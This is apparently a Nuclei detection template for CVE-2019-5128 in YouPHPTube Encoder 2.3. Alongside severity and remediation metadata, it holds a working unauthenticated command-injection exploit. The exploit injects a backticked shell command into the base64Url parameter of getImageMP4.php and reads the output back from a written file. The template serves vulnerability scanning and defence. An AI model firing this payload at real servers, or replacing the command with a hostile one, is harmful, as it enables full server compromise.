id: CVE-2019-5128

info:
  name: YouPHPTube Encoder - Arbitrary File Write
  author: pussycat0x
  severity: critical
  description: |
    Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube.The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands through command injection, leading to complete server compromise and potential access to all media content.
  remediation: |
    Upgrade to YouPHPTube Encoder version 2.4 or later, or apply vendor-provided security patches.
  reference:
    - https://xz.aliyun.com/news/6312
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-5128
    cwe-id: CWE-78
    epss-score: 0.9306
    epss-percentile: 0.99797
    cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: youphptube
    product: youphptube_encoder
    fofa-query: icon_hash="-276846707"
  tags: cve,cve2019,youphptube,intrusive,encoder,vkev,vuln

variables:
  file_name: "{{rand_text_alpha(4)}}.txt"
  content: "id"
  payload: '{{base64(concat("`", content, " > ", file_name, "`"))}}'

http:
  - raw:
      - |
        GET /objects/getImageMP4.php?base64Url={{payload}}&format=jpg HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        GET /objects/{{file_name}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ba128222a7aa45bbea3543cb0879a82bf210f42b434d420eb4b1014b0cbe48fb022100fdc036be0b46ad41812e0a95415e7eb157e5617ba1c3bb25eee04ef945d46f36:922c64590222798bb761d5b6d8e72950